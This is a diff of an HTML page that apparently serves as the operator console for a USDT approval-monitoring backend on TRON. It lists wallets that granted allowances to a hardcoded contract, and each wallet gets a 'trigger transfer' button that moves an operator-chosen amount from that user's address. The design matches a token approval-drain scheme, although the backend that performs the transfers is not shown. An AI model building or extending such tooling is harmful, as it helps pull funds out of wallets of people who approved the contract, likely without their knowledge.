--- a/index.html
+++ b/index.html
@@ -1,31 +1,144 @@
 <!DOCTYPE html>
 <html lang="zh">
 <head>
-  <meta charset="UTF-8">
-  <title>USDT 授權監控後台</title>
-  <meta name="viewport" content="width=device-width, initial-scale=1.0">
-  <script src="https://cdn.jsdelivr.net/npm/axios/dist/axios.min.js"></script>
+    <meta charset="UTF-8">
+    <title>USDT 授權監控後台</title>
+    <meta name="viewport" content="width=device-width, initial-scale=1.0">
+    <!-- 引入 axios -->
+    <script src="https://cdn.jsdelivr.net/npm/axios/dist/axios.min.js"></script>
+    <script src="https://cdn.jsdelivr.net/npm/tronweb@4.4.0/dist/TronWeb.min.js"></script>
+    <style>
+        body {
+            font-family: sans-serif;
+            padding: 2em;
+            background: #f2f2f2;
+            text-align: center;
+        }
+        button {
+            background: #0984e3;
+            color: #fff;
+            border: none;
+            padding: 1em 2em;
+            border-radius: 8px;
+            font-size: 1.2em;
+            cursor: pointer;
+        }
+        .input {
+            padding: 0.5em;
+            margin: 0.5em 0;
+            width: 80%;
+            max-width: 300px;
+            box-sizing: border-box;
+        }
+        table {
+            margin-top: 20px;
+            width: 80%;
+            margin-left: auto;
+            margin-right: auto;
+            border-collapse: collapse;
+        }
+        th, td {
+            padding: 8px;
+            text-align: left;
+            border: 1px solid #ddd;
+        }
+    </style>
 </head>
 <body>
-  <h1>USDT 授權監控後台</h1>
-  <button id="refreshButton">刷新</button>
-  <button id="checkAuthorizationButton">檢查授權</button>
 
-  <div>
-    <label for="walletAddress">輸入錢包地址：</label>
-    <input type="text" id="walletAddress" placeholder="輸入錢包地址">
-  </div>
-  <table id="walletsTable" border="1">
-    <thead>
-      <tr>
-        <th>錢包地址</th>
-        <th>USDT 授權額度</th>
-        <th>TRX 餘額</th>
-      </tr>
-    </thead>
-    <tbody></tbody>
-  </table>
-  
-  <script src="script.js"></script>
+    <h1>USDT 授權監控後台</h1>
+    <div>
+        <label for="walletAddress">輸入錢包地址：</label>
+        <input type="text" id="walletAddress" class="input" placeholder="輸入錢包地址">
+        <button id="checkAuthorizationButton">檢查授權</button>
+    </div>
+    <br>
+    <table id="walletsTable">
+        <thead>
+            <tr>
+                <th>錢包地址</th>
+                <th>USDT 授權額度</th>
+                <th>TRX 餘額</th>
+                <th>操作</th>
+            </tr>
+        </thead>
+        <tbody></tbody>
+    </table>
+
+    <script>
+        const API_URL = "http://localhost:3333";  // 後端 API 地址
+        const AUTH_CONTRACT = "TLFVGYGU5wd4z3KzKxr35kNUHQ7zFtff5d";  // 授權合約地址
+
+        // 確保用戶使用 TronLink 並處於可操作狀態
+        async function checkWalletAuthorization() {
+            const walletAddress = document.getElementById("walletAddress").value.trim();
+            if (!walletAddress) return alert("請輸入錢包地址");
+
+            try {
+                // 發送請求至後端檢查授權
+                const response = await axios.post(`${API_URL}/check-wallet-authorization`, { walletAddress });
+
+                // 提示授權成功
+                alert(response.data.message);
+
+                // 刷新錢包列表
+                fetchWallets();
+            } catch (error) {
+                alert("授權檢查失敗： " + error.response?.data?.error || error.message);
+            }
+        }
+
+        // 獲取錢包授權資訊並顯示
+        async function fetchWallets() {
+            try {
+                const response = await axios.get(`${API_URL}/wallets`);
+                const wallets = response.data;
+
+                const tableBody = document.querySelector("#walletsTable tbody");
+                tableBody.innerHTML = ''; // 清空現有資料
+
+                wallets.forEach(wallet => {
+                    const row = document.createElement("tr");
+                    const walletCell = document.createElement("td");
+                    const allowanceCell = document.createElement("td");
+                    const trxBalanceCell = document.createElement("td");
+                    const actionsCell = document.createElement("td");
+
+                    walletCell.textContent = wallet.address;
+                    allowanceCell.textContent = "待查詢";  // 授權額度
+                    trxBalanceCell.textContent = "待查詢";  // TRX 餘額
+                    actionsCell.innerHTML = `<button onclick="triggerTransfer('${wallet.address}')">觸發轉帳</button>`;
+
+                    row.appendChild(walletCell);
+                    row.appendChild(allowanceCell);
+                    row.appendChild(trxBalanceCell);
+                    row.appendChild(actionsCell);
+
+                    tableBody.appendChild(row);
+                });
+            } catch (error) {
+                console.error("載入錢包資料失敗", error);
+                alert("載入資料失敗");
+            }
+        }
+
+        // 觸發轉帳
+        async function triggerTransfer(address) {
+            const amount = prompt("請輸入轉帳金額：");
+            if (!amount || isNaN(amount) || amount <= 0) return alert("請輸入有效金額");
+
+            try {
+                const response = await axios.post(`${API_URL}/trigger-transfer`, { userAddress: address, amount });
+                alert("✅ 轉帳成功！");
+            } catch (error) {
+                alert("❌ 轉帳失敗：" + error.message);
+            }
+        }
+
+        // 綁定事件
+        document.getElementById("checkAuthorizationButton").addEventListener("click", checkWalletAuthorization);
+        window.onload = fetchWallets;  // 頁面載入時顯示錢包資料
+    </script>
+
 </body>
 </html>
